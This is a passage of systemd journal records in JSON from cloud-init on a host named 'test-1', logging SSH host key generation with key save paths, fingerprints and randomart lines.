"_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o . + . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ab;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=69755eccf423747f", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ac;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ad;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8404d615c5ac7141", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private ecdsa key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ae;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ff1320d32445e830", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_ecdsa_key." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2af;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5c01b1f22bbb1520", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_ecdsa_key.pub." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5750a197ed3e2276", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:ik8suaV9cNf+I5fd9XYM2qoT9vF08FA3bGdE4oH0qQo root@test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b912c77efc7e4919", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[ECDSA 256]---+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7bb4603c042c98da", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| ...+oo|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7ee5b8e9f9dc40d2", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .o B=|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ff7cff72ff6643ba", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| =o+|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8accf5e248f6a562", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b5ce2a231b940b45", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| E .. + |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=add86eb92dc43132", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +....+.o o +|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ba;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2ef7cc08ed3fac95", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + =o o.+ * *+|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bb;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=4aa22db2063ddc55", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| O . . = * B|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bc;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=28e3fbd75f74d823", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o o. .o.=.o.|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bd;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2be;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d7c073cdcdbf46d6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private ed25519 key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bf;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8539d8794592c42b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_ed25519_key." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a04169e245d150cc", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_ed25519_key.pub." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=345a32106e197585", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : 